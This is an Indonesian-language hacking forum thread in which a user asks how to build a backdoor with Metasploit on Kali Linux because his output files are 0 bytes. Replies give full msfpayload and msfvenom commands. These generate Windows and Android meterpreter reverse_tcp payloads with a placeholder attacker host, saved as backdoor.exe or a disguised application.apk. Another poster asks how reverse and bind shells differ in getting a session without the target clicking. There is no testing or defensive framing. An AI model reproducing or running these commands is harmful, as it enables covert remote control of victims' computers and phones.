[Ask] Cara membuat backdoor dengan metasploit ?
#1
bro ane udah baca tutor di google ddan sebagainya.
Ane make Kali Linux 2.0
Nah pada saat ane buat backdoor.exe / apk nya kok ukurannya backdoor 0 bytes ya ?
Solusinya dong mas

#2
(11-03-2015, 11:38 PM)D4NT3 Wrote: bro ane udah baca tutor di google ddan sebagainya.
Ane make Kali Linux 2.0
Nah pada saat ane buat backdoor.exe / apk nya kok ukurannya backdoor 0 bytes ya ?
Solusinya dong mas

perintahnya bener ga? coba tulis perintahnya disini om

#3
Boleh liat command yg ente gunakan kayak gmna bro ??


** untuk .exe . berarti untuk target platform windows 
> msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.x LPORT=443 R > bakdor.exe


**
Untuk .apk , berarti untuk target platform Android
> msfpayload android/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=4444 R > application.apk
Klik Here

Clound@IBTeam:~#
EMail Me : [email protected]

#4
(11-04-2015, 07:44 PM)Clound_Carbelius Wrote: Boleh liat command yg ente gunakan kayak gmna bro ??


** untuk .exe . berarti untuk target platform windows 
> msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.x LPORT=443 R > bakdor.exe


**
Untuk .apk , berarti untuk target platform Android
> msfpayload android/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=4444 R > application.apk

untuk kali mungkin msfvenom, krn msfpayload uda gabisa
cmiiw


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do



#5
(11-04-2015, 10:18 PM)cyberking Wrote:
(11-04-2015, 07:44 PM)Clound_Carbelius Wrote: Boleh liat command yg ente gunakan kayak gmna bro ??


** untuk .exe . berarti untuk target platform windows 
> msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.x LPORT=443 R > bakdor.exe

**
Untuk .apk , berarti untuk target platform Android
> msfpayload android/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=4444 R > application.apk

untuk kali mungkin msfvenom, krn msfpayload uda gabisa
cmiiw

ternyata beda ya, baru ngerti.
antonl | Psycho Security | [email protected]

#6
makasih brobrosemua Big Grin  hehehehehe msfvenom

#7
ikut nimbrung bang..

ada yg tau ngk bedanya
reverse_tcp dan bind_tcp..

ane udh baca baca sih., tapi masih kurang mudeng..
apa bind_tcp bisa langsung masuk sesi meterpreter tanpa si target klik payload 2x /?

#8
(11-04-2015, 10:18 PM)cyberking Wrote:
(11-04-2015, 07:44 PM)Clound_Carbelius Wrote: Boleh liat command yg ente gunakan kayak gmna bro ??


** untuk .exe . berarti untuk target platform windows 
> msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.x LPORT=443 R > bakdor.exe


**
Untuk .apk , berarti untuk target platform Android
> msfpayload android/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=4444 R > application.apk

untuk kali mungkin msfvenom, krn msfpayload uda gabisa
cmiiw

yup tepat (y)

#9
(11-04-2015, 10:18 PM)cyberking Wrote:
(11-04-2015, 07:44 PM)Clound_Carbelius Wrote: Boleh liat command yg ente gunakan kayak gmna bro ??


** untuk .exe . berarti untuk target platform windows 
> msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.x LPORT=443 R > bakdor.exe


**
Untuk .apk , berarti untuk target platform Android
> msfpayload android/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=4444 R > application.apk

untuk kali mungkin msfvenom, krn msfpayload uda gabisa
cmiiw

tapi ane udah coba pake msfvenom, buat coba bikin backdoor nya, tapi kok file nya tetep 0 bytes ya??

#10
msfpayload udah ga berfungsi di kali linux dan sekarang menggunakan msfvenom

jadi kalo mau bikin backdoor bisa dengan perintah ini:
(contoh saya mau buat backdoor dengan nama "backdoor")

msfvenom -p android/meterpreter/reverse_tcp LHOST="ip local anda" LPORT="bebas" R > backdoor.apk


kalo ditujukan untuk windows gunakan format exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST="ip local anda" LPORT="bebas" R > backdoor.exe


semoga bermanfaat






Users browsing this thread: 1 Guest(s)